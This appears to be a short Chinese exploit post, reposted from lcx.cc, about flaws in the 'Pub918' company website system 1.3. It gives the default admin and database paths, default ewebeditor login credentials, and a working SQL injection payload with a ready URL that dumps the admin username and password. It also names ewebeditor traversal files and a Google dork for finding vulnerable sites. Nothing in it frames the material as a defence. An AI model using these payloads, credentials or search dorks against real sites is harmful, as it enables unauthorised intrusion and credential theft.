0x0,默认后台及数据库:
后台:admin/
默认数据库:admin/db/N%23%23ews.mdb
0x1,ewebeditor 问题:
路径:
admin/webedit/admin_login.asp
帐号密码:
admin
29767143
利用:略,你懂的。
0x2,注入漏洞:
漏洞文件:new.asp
查询语句:union select 1,2,3,adminUID,5,6,7,adminPWD,9,10 from admin
利用:随便打开一个新闻在后面加上查询语句即可爆出管理帐号密码。
如:
http://localhost/new.asp?id=62 union select 1,2,3,adminUID,5,6,7,adminPWD,9,10 from admin
0x3,ewebeditor 遍历漏洞:
漏洞文件:
Admin_UploadFile1.asp
Admin_UploadFile.asp
利用:略,你懂的。
Google 搜索:
inurl:download.asp
Author:Mr.DzY
文章来源于lcx.cc:Pub918 软件公司网站系统 1.3 存在多处漏洞
DNS(域名服务器)欺骗技术 [翻译]DNS(域名服务器)欺骗技术文章作者:Spacefox, Secure Sphere Crew 译文作者:Conan, OS3 (Open Source Software Society) / CICC Singapore…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论